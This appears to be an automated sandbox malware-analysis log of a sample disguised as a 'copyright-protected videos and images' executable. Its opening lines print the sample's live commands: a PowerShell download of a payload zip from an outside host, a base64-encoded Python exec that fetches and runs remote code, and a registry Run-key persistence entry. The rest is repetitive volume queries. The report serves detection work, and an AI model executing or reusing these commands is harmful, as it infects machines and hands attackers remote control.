Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start "" "C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe" -c "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZXF1ZXN0O2ltcG9ydCBiYXNlNjQ7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi5yZXF1ZXN0LnVybG9wZW4oJ2h0dHBzOi8vdHZkc2VvLmNvbS93cC1jb250ZW50L2NhY2hlL3dwLXJvY2tldC9BZG9uaXMvQWRvbmlzJykucmVhZCgpLmRlY29kZSgndXRmLTgnKSkp'))"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [system.io.path]::gettemppath() + 'qkxb9wn8ng.zip') "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $dst = [system.io.path]::combine([system.environment]::getfolderpath('localapplicationdata'), 'qkxb9wn8ng'); add-type -assemblyname system.io.compression.filesystem; if (test-path $dst) { remove-item -recurse -force "$dst\*" } else { new-item -itemtype directory -force $dst } ; [system.io.compression.zipfile]::extracttodirectory([system.io.path]::combine([system.io.path]::gettemppath(), 'qkxb9wn8ng.zip'), $dst) "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo new-itemmroperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows security' -propertytype string -value 'c:\windows\explorer.exe c:\users\user\appdata\local\windowssecurity.lnk' -force "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start "" "c:\users\user\appdata\local\qkxb9wn8ng\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dhbzoi8vdhzkc2vvlmnvbs93cc1jb250zw50l2nhy2hll3dwlxjvy2tldc9bzg9uaxmvqwrvbmlzjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe "c:\users\user\appdata\local\qkxb9wn8ng\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dhbzoi8vdhzkc2vvlmnvbs93cc1jb250zw50l2nhy2hll3dwlxjvy2tldc9bzg9uaxmvqwrvbmlzjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://tvdseo.com/wp-content/cache/wp-rocket/synaptics.zip', [system.io.path]::gettemppath() + 'qkxb9wn8ng.zip') "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $dst = [system.io.path]::combine([system.environment]::getfolderpath('localapplicationdata'), 'qkxb9wn8ng'); add-type -assemblyname system.io.compression.filesystem; if (test-path $dst) { remove-item -recurse -force "$dst\*" } else { new-item -itemtype directory -force $dst } ; [system.io.compression.zipfile]::extracttodirectory([system.io.path]::combine([system.io.path]::gettemppath(), 'qkxb9wn8ng.zip'), $dst) "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo new-itemmroperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows security' -propertytype string -value 'c:\windows\explorer.exe c:\users\user\appdata\local\windowssecurity.lnk' -force "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start "" "c:\users\user\appdata\local\qkxb9wn8ng\synaptics.exe" -c "import base64;exec(base64.b64decode('aw1wb3j0ihvybgxpyi5yzxf1zxn0o2ltcg9ydcbiyxnlnjq7zxhlyyhiyxnlnjquyjy0zgvjb2rlkhvybgxpyi5yzxf1zxn0lnvybg9wzw4oj2h0dhbzoi8vdhzkc2vvlmnvbs93cc1jb250zw50l2nhy2hll3dwlxjvy2tldc9bzg9uaxmvqwrvbmlzjykucmvhzcgplmrly29kzsgndxrmltgnkskp'))"

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Program Files (x86) VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Program Files (x86) VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Program Files (x86) VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Program Files (x86) VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Program Files (x86) VolumeInformation
Source: C:\Users\user\Downloads\Compilation of copyright-protected videos and images\Compilation of copyright-protected videos and images.exe	Queries volume information: C:\Users\user\Downloads\Compilation of copyright-protected videos and images VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__\__init__.cpython-310.pyc.7301264 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\codecs.cpython-310.pyc.20128504 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__\aliases.cpython-310.pyc.7301864 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.7371984 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.7371872 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\io.cpython-310.pyc.20129752 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\abc.cpython-310.pyc.20217328 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\site.cpython-310.pyc.20216912 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\os.cpython-310.pyc.20242008 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\stat.cpython-310.pyc.21630760 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\_collections_abc.cpython-310.pyc.20329712 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\ntpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\ntpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\ntpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\ntpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\ntpath.cpython-310.pyc.23839064 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\__pycache__\genericpath.cpython-310.pyc.21470528 VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\user\AppData\Local\qkxB9Wn8nG\synaptics.exe	Queries volume information: C:\Users\user\AppData\Local\qkxB9Wn8nG\Lib\_sitebuiltins.py VolumeInformation
